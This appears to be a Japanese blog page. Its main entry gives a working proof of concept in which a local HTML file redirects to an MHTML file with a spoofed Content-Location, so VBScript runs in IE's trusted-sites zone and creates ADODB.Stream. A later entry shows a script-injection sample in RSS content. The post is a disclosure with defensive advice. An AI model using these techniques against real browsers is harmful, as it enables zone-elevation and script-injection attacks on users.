黄金の釘

劫初より造りいとなむ殿堂に、われも黄金の釘一つうつ与謝野晶子

私は黄金はおろか普通の釘すら持っていません。しかし何かしらを痕跡として残せると思います。何になるのかは未だ知ることが出来ません。

覚書:XPSP2:ローカルでHTMLファイルをIEで開いて信頼済みサイトゾーン権限のスクリプトが動く

WindowsXP の ServicePack2 では ローカルマシンゾーンではロックダウンが効いていて従来のWindowsよりもかなり安全度が高くなっています。しかし以下のような仕様も依然として存在しています。実際に確かめてみます。

まず、信頼済みサイトゾーンに登録しているサイトをひとつ、みつくろいます。ことによるとオンラインバンクのサイトを登録していませんか?以下の私の例では、http://update.microsoft.com 、WindowsUpdateに使っているサイトとします。

ローカルの同じディレクトリ(=フォルダ)にファイルを2個作成します。ここでは、ひとつは、test.htm もうひとつは、call.mht とします。

以下は test.htm のソースです。

<META HTTP-EQUIV="refresh" CONTENT="0; url=./call.mht">

以下は call.mht のソースです。さきほどの信頼済みサイトゾーンのURLが使われています。

MIME-Version: 1.0
Content-Type: multipart/related;
	type="text/html";
	boundary="----=_NextPart_000_0000_01C5D75B.E1F6A280"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2670

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01C5D75B.E1F6A280
Content-Type: text/html;
	charset="iso-8859-1"
Content-Location: http://update.microsoft.com

<html>
<head>
<script language="VBScript">
Sub window_onload()
Set Stream=SC.Eval("CreateObject(""ADODB.Stream"")")
MsgBox "ADODB." + TypeName(Stream)
End Sub
</script>
</head>
<body>
<object id=SC classid=clsid:0E59F1D5-1FBE-11D0-8FF2-00A0D10038BC>
<param name=Language value="VBScript">
</object>
</body>
</html>

------=_NextPart_000_0000_01C5D75B.E1F6A280--

test.htm をIEで開くと、call.mht にリダイレクトされます。call.mht は MHTMLファイルですが、The Content-Location identifies a URI for a content part, the part need not be universally retrievable using this base. の性質があります。そして、Content-Location は信頼済みサイトゾーンのものを使っています。すなわち、call.mht のスクリプトは信頼済みサイトゾーンの権限でで処理されます。

上のサンプルでは、ADODB.stream を呼び出すところまでです。MsgBoxで、"ADODB.stream" と表示されれば成功です。但し、途中、ActiveXが作動しても良いかどうか聞かれます。ここでは、使っているものが安全だとマークされていないActiveXですが、信頼済みサイトゾーンの設定により(既定値ならばですが)ダイアログが表示されることになっています。他のセキュリティゾーンではこのダイアログが出る前に情報バーで阻止されるはずです。また、call.mht が開かれた時のウィンドウの右下に表示されるゾーンの種別は信頼済みサイトゾーンになっているかと思います。

上のサンプルでもわかる通り、LMZ(ローカルマシンゾーン)のロックダウンが効いていても、ローカルなHTMLファイルをIEで開く操作で、信頼済みサイトゾーンの権限のスクリプトの実行がひきおこされることがあることがわかります。

上の性質は、仕様です。Micorosoft社からは正式にそのことを聞いております。

ダウンロードしたHTMLファイルをうかつに開くことはやめましょう>IEユーザ

また、信頼済みサイトゾーンやイントラネットゾーンの設定においてセキュリティのレベルは「中」以上にしておきましょう。

歴代天皇のラテン風の名前

何語でしょうか。明治天皇がMeidiusですよ。仁徳天皇はNintocusですよ。

メモ・マーク区間の解釈について

<sample><![CDATA[<br /><script>document.title='RSS';</script><s>kumori</s>]]></sample>

WindowsXPsp2のIE6SP2では、上記でタイトルバーが書き変わる場合がある。はてなRSSリーダーでは、こういうのを読み取っても適宜ねぐっていているようでスクリプトは発動していないが、ねぐりすぎて文意が読み取れない場合がありそう。こういういのって吐き出す側の責任だよねぇ?いや、元を只せばブラウザの責任なのかなぁ。わかんない。

    _
   / /|)
  | ̄|
 / /

クリックするな運動

マウスからクリック機能をなくそう運動展開中のサイト、http://www.dontclick.itを読みました。なるほど、かなりマジにクリック廃絶の方法論を語っているかと思えば、ゲームあり、ジョークあり。私達が通常使っているマウスのクリックをしないように強制するための増強アタッチメントも紹介されています。たんにマウスにかぶせる剣山なのですけど。痛い。ゲームではちゃんと中級まで行きました。クリックすると負けです(笑)。いやぁ力がはいるとクリックするものなのですね、慣れるまで全敗ですよ。

基本的にはクリックなしで全てのコンテンツが参照できるようになっているはずなのですが、トップページから各コンテンツに行くときだけはクリックが必要のようです。あ、申し遅れましたが、Flashですから。なかなか映像的には楽しいのですが。私みたいな素人さんは驚くことがいっぱいでした。そうだ、後ででLynxで見てみよう。Web/HTML文化に立ち返る訓練もたまには必要だし。

標語:ウイルス感染もスパムもフィッシングも全部が全部クリックインターフェースが悪いんやあぁあぁ。もうマウスにはボタンはいらないんやあぁあぁっ